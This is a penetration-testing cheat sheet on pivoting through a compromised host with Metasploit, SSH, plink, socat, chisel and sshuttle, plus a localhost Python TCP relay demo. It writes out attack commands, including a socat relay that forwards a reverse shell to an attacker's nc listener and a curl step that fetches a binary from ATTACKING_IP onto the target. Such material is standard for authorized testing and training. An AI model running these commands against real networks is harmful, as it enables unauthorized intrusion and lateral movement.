Pivoting
1- Metasploit: -
After exploiting one machine and getting a meterpreter session on it, run the following commands from that session:-
1- run autoroute -s TARGET_NETWORK/CIDR -> adds a route through the session so framework modules can reach that subnet (e.g. run autoroute -s 10.10.10.0/24; run autoroute -p prints the current routes).
2- run post/windows/gather/arp_scanner RHOSTS=TARGET_NETWORK/CIDR -> to see the reachable active hosts.
3- use auxiliary/server/socks_proxy (auxiliary/server/socks4a on older versions), set SRVPORT, then run -j -> opens a SOCKS proxy on the attacking machine that uses the routes added above.
4- Then add socks5 127.0.0.1 SRVPORT (socks4 for the socks4a module) to /etc/proxychains.conf and use proxychains in the attacking machine to run commands like nmap. Only TCP connect traffic goes through a SOCKS proxy, so scan with nmap -sT -Pn; ping and SYN scans will not work through the proxy.
2- Without Metasploit: -
There are various tools for that:-
· SSH tunneling and port forwarding (needs an SSH server you can log in to on the pivot host):-
1- Forward connection (local port forward) - run the following command on the attacking machine:-
A- ssh -L LOCAL_PORT:DESTINATION_IP:DESTINATION_PORT USER@SSH_SERVER -fN -> connecting to 127.0.0.1:LOCAL_PORT on the attacking machine now reaches DESTINATION_IP:DESTINATION_PORT as seen from SSH_SERVER. -f backgrounds the session, -N runs no remote command (both lowercase; -F is the config-file option).
2- Create a SOCKS proxy using ssh (dynamic port forward) - run the following command on the attacking machine:-
A- ssh -D PORT USER@SSH_SERVER -fN -> SOCKS proxy on 127.0.0.1:PORT; add socks5 127.0.0.1 PORT to /etc/proxychains.conf and run tools with proxychains.
· Plink.exe (PuTTY's command-line SSH client, for a Windows target that has no ssh client; it tunnels back to an SSH server running on the attacking machine):-
1- sudo apt install putty-tools -> provides puttygen on the attacking machine.
2- puttygen KEYFILE -o FILE.ppk -> converts the OpenSSH private key to PuTTY's .ppk format (plink does not accept OpenSSH keys as-is). Use a dedicated key for this, and transfer plink.exe and FILE.ppk to the target.
3- On the target -> cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:DESTINATION_IP:DESTINATION_PORT USER@ATTACKING_IP -i FILE.ppk -N -> reverse port forward: the attacking machine's SSH server listens on LOCAL_PORT and forwards to DESTINATION_IP:DESTINATION_PORT as reached from the target. echo y auto-accepts the host-key prompt, which would otherwise hang a non-interactive shell.
· Socat
1- Reverse shell relay (the compromised target forwards a shell from a deeper host back to the attacking machine):-
A- On attacking -> nc -nlvp PORT
B- On target -> ./socat tcp-l:LOCAL_PORT tcp:ATTACKING_IP:PORT & -> then point the reverse shell on the deeper host at TARGET_IP:LOCAL_PORT; it is relayed to the nc listener.
2- Port forward (quiet version: no listening port is opened on the target, it connects out to the attacking machine instead):-
A- On attacking -> socat tcp-l:PORT1 tcp-l:PORT2,fork,reuseaddr &
B- On target -> ./socat tcp:ATTACKING_IP:PORT1 tcp:DESTINATION_IP:DESTINATION_PORT,fork &
Then connect to 127.0.0.1:PORT2 on the attacking machine to reach DESTINATION_IP:DESTINATION_PORT. Address options are comma-separated with no spaces (tcp-l:PORT,fork,reuseaddr); with a space socat reads them as a separate argument and fails.
· Chisel (single binary for windows and linux; needs no ssh on either side, but the binary must be copied to the target):
1- Reverse SOCKS proxy (the target connects back to the attacking machine):-
A- On attacking -> ./chisel server -p PORT --reverse &
B- On target -> ./chisel client ATTACKING_IP:PORT R:socks &
The SOCKS proxy listens on the attacking machine at 127.0.0.1:1080 by default (use R:PROXY_PORT:socks to choose another port).
2- Forward SOCKS proxy (the attacking machine connects to a listener on the target):-
A- On target -> ./chisel server -p PORT --socks5 &
B- On attacking -> ./chisel client TARGET_IP:PORT PROXY_PORT:socks &
In both cases add socks5 127.0.0.1 PROXY_PORT to /etc/proxychains.conf.
· sshuttle (VPN-like: transparently routes a whole subnet over an ssh connection, so no proxychains is needed; requires python on the SSH server):-
1- sshuttle -r USER@IP_SERVER SUBNET -x IP_SERVER -> -x excludes the SSH server's own address from the tunnel so the ssh connection itself is not routed into it.
2- With key authentication: sshuttle -r USER@IP_SERVER SUBNET -x IP_SERVER --ssh-cmd "ssh -i PRIV_KEY"
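All of the port forwards above (ssh -L, the socat forward, a chisel forward, plink -R) do the same thing underneath: accept a connection on one side and copy bytes to a destination the other side can reach. The following is an added example, not code from these notes or from any of the tools, that implements that relay in plain Python so the behaviour can be tested locally. The echo service standing in for the internal target and all hosts/ports are constructed for the demo.

```python
# Added example: a minimal TCP port-forward relay, the mechanism behind
# `socat tcp-l:PORT,fork,reuseaddr tcp:DEST:DPORT`, `ssh -L` and chisel forwards.
import socket
import threading


def _pump(src, dst):
    """Copy bytes src -> dst until EOF/error, then half-close dst so the far
    side sees the EOF too; the opposite direction keeps running."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _handle(client, upstream):
    """One relayed connection (socat's ,fork): two pumps, then close both."""
    t_up = threading.Thread(target=_pump, args=(client, upstream))
    t_down = threading.Thread(target=_pump, args=(upstream, client))
    t_up.start(); t_down.start(); t_up.join(); t_down.join()
    client.close(); upstream.close()


def start_relay(listen_host, listen_port, dest_host, dest_port):
    """Listen on listen_host:listen_port, relay every client to dest_host:dest_port.
    Returns (listening socket, bound port); port 0 picks a free one; close the
    socket to stop the relay."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  # socat's ,reuseaddr
    srv.bind((listen_host, listen_port))
    srv.listen(16)

    def accept_loop():
        while True:
            try:
                client, _ = srv.accept()
            except OSError:
                return  # listener closed
            try:
                upstream = socket.create_connection((dest_host, dest_port), timeout=5)
                upstream.settimeout(None)  # timeout applies to connect only
            except OSError:
                client.close()  # destination unreachable: drop this client only
                continue
            threading.Thread(target=_handle, args=(client, upstream), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1]


def start_echo_server():
    """Constructed stand-in for the internal service behind the pivot
    (think DESTINATION_IP:3306): echoes whatever it receives."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)

    def serve(conn):
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    return
                conn.sendall(data)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=serve, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1]


def relay_roundtrip(payload):
    """Send payload through relay -> echo service; returns the echoed bytes."""
    echo, echo_port = start_echo_server()
    relay, relay_port = start_relay("127.0.0.1", 0, "127.0.0.1", echo_port)
    try:
        with socket.create_connection(("127.0.0.1", relay_port), timeout=5) as c:
            c.sendall(payload)
            c.shutdown(socket.SHUT_WR)  # our EOF travels through the relay
            chunks = []
            while True:
                data = c.recv(4096)
                if not data:
                    break
                chunks.append(data)
        return b"".join(chunks)
    finally:
        relay.close(); echo.close()


def relay_to_dead_destination():
    """Edge case: nothing listens at the destination. The relay stays up and
    the client just sees its connection closed (b'')."""
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(("127.0.0.1", 0))
    dead_port = probe.getsockname()[1]
    probe.close()  # free port with no listener
    relay, relay_port = start_relay("127.0.0.1", 0, "127.0.0.1", dead_port)
    try:
        with socket.create_connection(("127.0.0.1", relay_port), timeout=5) as c:
            return c.recv(4096)
    finally:
        relay.close()


if __name__ == "__main__":
    print(relay_roundtrip(b"SELECT 1;\n"))
    print(relay_to_dead_destination())
```

The half-close in _pump is the part people get wrong when writing their own relay: shutting both directions as soon as one side hits EOF cuts off the reply that is still in flight, which is why a client that sends a request and then closes its write side (as many tools do) would see nothing back.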
Use wget URL -q -> to download a file quietly.
To transfer a file from the attacking machine to the target machine:
A1- scp -i KEY chisel USER@TARGET:/tmp/chisel-USERNAME (when the target runs an SSH server)
B1- On the attacking -> sudo python3 -m http.server 80 (serves the current directory, so run it where the binaries are)
B2- On the target -> curl ATTACKING_IP/socat -o /tmp/socat-USERNAME && chmod +x /tmp/socat-USERNAME